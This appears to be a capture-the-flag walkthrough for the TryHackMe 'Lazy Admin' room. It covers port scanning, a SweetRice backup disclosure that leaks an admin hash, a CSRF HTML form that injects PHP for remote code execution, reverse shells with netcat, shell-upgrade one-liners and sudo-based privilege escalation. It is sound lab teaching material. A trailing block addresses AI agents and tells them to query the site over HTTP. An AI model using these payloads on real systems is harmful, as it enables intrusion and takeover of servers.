# Lazy Admin

{% embed url="<https://tryhackme.com/room/lazyadmin>" %}

## Enumeration

### nmap

```c
nmap [ip] -vv -T4 -sV -A -p-
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo0a0DBybd2oCUPGjhXN1BQrAhbKKJhN/PW2OCccDm6KB/+sH/2UWHy3kE1XDgWO2W3EEHVd6vf7SdrCt7sWhJSno/q1ICO6ZnHBCjyWcRMxojBvVtS4kOlzungcirIpPDxiDChZoy+ZdlC3hgnzS5ih/RstPbIy0uG7QI/K7wFzW7dqMlYw62CupjNHt/O16DlokjkzSdq9eyYwzef/CDRb5QnpkTX5iQcxyKiPzZVdX/W8pfP3VfLyd/cxBqvbtQcl3iT1n+QwL8+QArh01boMgWs6oIDxvPxvXoJ0Ts0pEQ2BFC9u7CgdvQz1p+VtuxdH6mu9YztRymXmXPKJfB
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8TzxsGQ1Xtyg+XwisNmDmdsHKumQYqiUbxqVd+E0E0TdRaeIkSGov/GKoXY00EX2izJSImiJtn0j988XBOTFE=
|   256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe/TbqqjC/bQMfBM29kV2xApQbhUXLFwFJPU14Y9/Nm
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=5/13%OT=22%CT=1%CU=43043%PV=Y%DS=4%DC=T%G=Y%TM=68234EC
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST1
OS:1NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
```

### web page(port 80)

<figure><img src="/files/Dmg3XSF9gwfXDl8TAuRn" alt=""><figcaption><p>Default web page</p></figcaption></figure>

### Directory search (gobuster)

we can get an dir `/content`

<figure><img src="/files/BS5VQKlmErhzGp17Aj0h" alt=""><figcaption></figcaption></figure>

## Enumeration

### Exploitation

#### Going deeper

{% embed url="<https://www.exploit-db.com/exploits/10246>" %}

<figure><img src="/files/AVBnypsvTc5q0XAH5RZM" alt=""><figcaption><p>content page</p></figcaption></figure>

We can see that we got some info: powered by **SweetRice**

I went on exploit.db and saw one exploit. it’s an RFI. But it’s not an RFI, instead we can grab the path and see if we there’s anything

Since there’s no **sweetrice** directory we assume that the **sweetrice** itself is **content** in this case, and I add `_plugin` then we got the whole index

Other than that there’s no directories that we can do exploit

<figure><img src="/files/bkjSA695qMXsRXfuUxAU" alt=""><figcaption><p>index of /content/_plugin</p></figcaption></figure>

#### Accessing Backup file

{% embed url="<https://www.exploit-db.com/exploits/40718>" %}

<figure><img src="/files/aZqJOKxsjaE7aeWbnuev" alt=""><figcaption><p>Mysql backup file</p></figcaption></figure>

I checked many of the exploits since we have no idea what the version is and I found the **backup disclosure** exploit

Now we have to add `/inc/mysql_backup` and we access the sql backup file

After opening the file we can take a look at the stored cred, here we are aiming for any users

### Getting creds

<figure><img src="/files/AYzriMZ8pb9gMYuatPRt" alt=""><figcaption></figcaption></figure>

And we got it, admin: manager | passwd: \<hash>

We can put the password on cyberchef and analyze the hash which seems to be a md5 hash

<figure><img src="/files/abpk5U47CwuB0ImozKe3" alt=""><figcaption><p>Password</p></figcaption></figure>

And after decrypting it we can see it’s a weak password

Since we have no idea where the login page is, we can use another exploitation which is editing a html file and just open it

#### RCE

{% embed url="<https://www.exploit-db.com/exploits/40700>" %}

* This is where you have to edit an html file

```html
<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/content/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
&lt;/textarea&gt;
</form>
</body>
</html>
# After HTML File Executed You Can Access Page In
http://localhost/content/inc/ads/hacked.php
```

This file is checking if that will work by opening up a **hacked.php** file (you have to change the path to the current one, like **sweetrice** → **content**)

But I want to speed up the process so I just paste the whole php RCE file in the html session <https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php>

<figure><img src="/files/rTUFY5JEXIGhmIfB9pvI" alt=""><figcaption><p>open html file</p></figcaption></figure>

Here we open with firefox, and it should be a login page, just enter the creds you got earlier and we are in

Open netcat and we can start listening the incoming traffic `nc -lvnp <port_you_are_listening_to>`

Noticed the hacked thing hanging above the ads editing session, we can perform a RCE by going`http://RHOST/content/inc/ads/hacked.php`

<figure><img src="/files/Hy0p07uXCpPFR6JL6maY" alt=""><figcaption><p>logged in</p></figcaption></figure>

Back to the terminal we can see we’re in

### Upgrading shell session

we can upgrade our shell but it’s not required

<https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell>

```c
python -c 'import pty; pty.spawn("/bin/sh")'

echo os.system('/bin/bash')

/bin/sh -i

perl —e 'exec "/bin/sh";'

perl: exec "/bin/sh";

ruby: exec "/bin/sh"

lua: os.execute('/bin/sh')

(From within IRB)
exec "/bin/sh"

(From within vi)
:!bash

(From within vi)
:set shell=/bin/bash:shell

(From within nmap)
!sh

/usr/bin/script -qc /bin/bash /dev/null
```

### Privilege escalation

{% embed url="<https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>" %}

Let’s do a simple `sudo -l`

<figure><img src="/files/mkbZJdEUC3MXrh6uX9qW" alt=""><figcaption><p>sudo -l</p></figcaption></figure>

We can see the `/usr/bin/perl` and `/home/itguy/backup.pl` are open

I’ve tried using only **perl** but it requires password so let’s take a look inside the **backup.pl**

<figure><img src="/files/GMGwcZPCgejL8JlaXYgA" alt=""><figcaption></figcaption></figure>

The file is executing a file `/etc/copy.sh`

Let’s see what’s inside. Woah it’s another reserve shell session

Let’s open another session for netcat (must do another port)

We can just change the ip and port to our machine then execute it by doing `sudo /usr/bin/perl /home/itguy/backup.pl`

<figure><img src="/files/WBLU1ZnqZM9wp6M7hj8G" alt=""><figcaption><p>modifying &#x26; executing copy.sh</p></figcaption></figure>

<figure><img src="/files/Zing2DZiw0oghEflbC6L" alt=""><figcaption><p>Reverse shell</p></figcaption></figure>

And now we are root

The flags are in **itguy** and **root** dir


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://vix-w1zzer.gitbook.io/vixwizzer/walkthroughs/lazy-admin.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.